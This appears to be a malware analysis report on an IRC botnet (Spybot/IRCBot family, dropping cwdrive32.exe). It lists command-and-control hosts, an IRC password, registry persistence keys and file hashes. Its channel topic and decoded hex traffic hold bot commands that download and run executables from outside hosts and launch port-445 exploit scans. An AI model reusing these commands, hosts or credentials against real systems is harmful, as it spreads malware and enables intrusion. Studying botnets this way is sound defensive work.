mydrivers.babypin.net(Botnet hosted with United States Orange Vpls Inc. D/b/a Krypt Technologies)

mydrivers.babypin.net ip: 109.196.130.50
mydrivers.babypin.net ip: 109.196.130.66
mydrivers.babypin.net ip: 98.126.214.82

Remote Host Port Number
112.78.112.208 80
218.85.133.201 80
98.126.214.82 6682 PASS laorosr

USER SP2-364 * 0 :COMPUTERNAME
MODE [N00_USA_XP_6656961]
@ -ix
MODE #dpi -ix

Master86 changes topic to ‘.asc -S|.http http://208.53.183.181/icsy.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’

00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3636 3536 BCB9 4020 3A20 5472 7969 | P_6656..@ : Tryi
00000030 | 6E67 2074 6F20 6765 7420 6578 7465 726E | ng to get extern
00000040 | 616C 2049 502E 0D0A 5052 5256 4D53 4720 | al IP…PRRVMSG
00000050 | 5B4E 3030 5F55 5341 5F58 505F 3636 3536 | [N00_USA_XP_6656
00000060 | BCB9 4020 3A20 5261 6E64 6F6D 2050 6F72 | ..@ : Random Por
00000070 | 7420 5363 616E 2073 7461 7274 6564 206F | t Scan started o
00000080 | 6E20 3139 322E 782E 782E 783A 3434 3520 | n 192.x.x.x:445
00000090 | 7769 7468 2061 2064 656C 6179 206F 6620 | with a delay of
000000A0 | 3520 7365 636F 6E64 7320 666F 7220 3020 | 5 seconds for 0
000000B0 | 6D69 6E75 7465 7320 7573 696E 6720 3235 | minutes using 25
000000C0 | 2074 6872 6561 6473 2E0D 0A50 5252 564D | threads…PRRVM
000000D0 | 5347 205B 4E30 305F 5553 415F 5850 5F36 | SG [N00_USA_XP_6
000000E0 | 3635 36BC B940 203A 2054 7279 696E 6720 | 656..@ : Trying
000000F0 | 746F 2067 6574 2065 7874 6572 6E61 6C20 | to get external
00000100 | 4950 2E0D 0A50 5252 564D 5347 205B 4E30 | IP…PRRVMSG [N0
00000110 | 305F 5553 415F 5850 5F36 3635 36BC B940 | 0_USA_XP_6656..@
00000120 | 203A 2052 616E 646F 6D20 506F 7274 2053 | : Random Port S
00000130 | 6361 6E20 7374 6172 7465 6420 6F6E 2031 | can started on 1
00000140 | 3932 2E31 3638 2E78 2E78 3A34 3435 2077 | 92.168.x.x:445 w
00000150 | 6974 6820 6120 6465 6C61 7920 6F66 2035 | ith a delay of 5
00000160 | 2073 6563 6F6E 6473 2066 6F72 2030 206D | seconds for 0 m
00000170 | 696E 7574 6573 2075 7369 6E67 2032 3520 | inutes using 25
00000180 | 7468 7265 6164 732E 0D0A 5052 5256 4D53 | threads…PRRVMS
00000190 | 4720 5B4E 3030 5F55 5341 5F58 505F 3636 | G [N00_USA_XP_66
000001A0 | 3536 BCB9 4020 3A20 5365 7175 656E 7469 | 56..@ : Sequenti
000001B0 | 616C 2050 6F72 7420 5363 616E 2073 7461 | al Port Scan sta
000001C0 | 7274 6564 206F 6E20 3139 322E 3136 382E | rted on 192.168.
000001D0 | 302E 303A 3434 3520 7769 7468 2061 2064 | 0.0:445 with a d
000001E0 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
000001F0 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000200 | 7573 696E 6720 3230 2074 6872 6561 6473 | using 20 threads
00000210 | 2E0D 0A4E 4349 4B20 5B4E 3030 5F55 5341 | …NCIK [N00_USA
00000220 | 5F58 505F 3636 3536 3936 315D 18E7 400D | _XP_6656961]..@.
00000230 | 0A73 656E 6420 2321 2C23 4D61 206F 6F6F | .send #!,#Ma ooo
00000240 | 6F0D 0A50 5252 564D 5347 2023 6920 3A48 | o..PRRVMSG #i :H
00000250 | 5454 5020 5345 5420 6874 7470 3A2F 2F37 | TTP SET http://7
00000260 | 342E 3633 2E37 382E 3133 2F65 6B73 652E | 4.63.78.13/ekse.
00000270 | 6578 650D 0A | exe..

Other details

* The following ports were open in the system:

Port Protocol Process
1057 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1059 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1086 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1252 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1253 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1254 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1255 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1256 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1257 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1258 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1259 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1260 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1261 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1262 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1263 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1264 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1265 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1266 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1267 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1268 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1269 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1270 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1271 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1272 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1273 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1274 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1275 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1276 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1277 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1278 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1279 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1280 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1281 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1283 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1284 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1285 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1286 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1287 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1288 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1289 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1290 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1291 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1292 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1293 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1294 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1295 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1296 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1297 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1298 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1299 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1300 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1301 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1302 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1303 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1304 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1305 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1306 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1307 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1308 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1309 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1310 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1311 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1312 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1313 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1314 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1315 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1316 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1317 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1318 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1319 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1320 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1321 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1322 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1323 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1324 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1325 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1326 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1327 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1328 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1329 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1330 TCP cwdrive32.exe (%Windir%cwdrive32.exe)
1332 TCP cwdrive32.exe (%Windir%cwdrive32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%cwdrive32.exe”

so that cwdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%cwdrive32.exe”

so that cwdrive32.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
cwdrive32.exe %Windir%cwdrive32.exe 339 968 bytes

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash Alias
1 %Windir%cwdrive32.exe
[file and pathname of the sample #1] 47 616 bytes MD5: 0xC9E7C78A4BA809BBBABEF89CBDBE7D2D
SHA-1: 0x3D0A783C22F6640B7DA7AAEEA9490E12A0327FA4 Net-Worm.Spybot.C!rem [PCTools]
W32.Spybot.Worm [Symantec]
Backdoor.Win32.IRCBot.qbq [Kaspersky Lab]
Exploit-DcomRpc.gen [McAfee]
Troj/Swizzor-RC [Sophos]
Worm:Win32/Pushbot.gen [Microsoft]
Virus.Win32.IRCBot [Ikarus]
Win32/IRCBot.worm.Gen [AhnLab]

infos about hosters:
http://whois.domaintools.com/98.126.214.82
http://whois.domaintools.com/74.63.78.13
http://whois.domaintools.com/208.53.183.181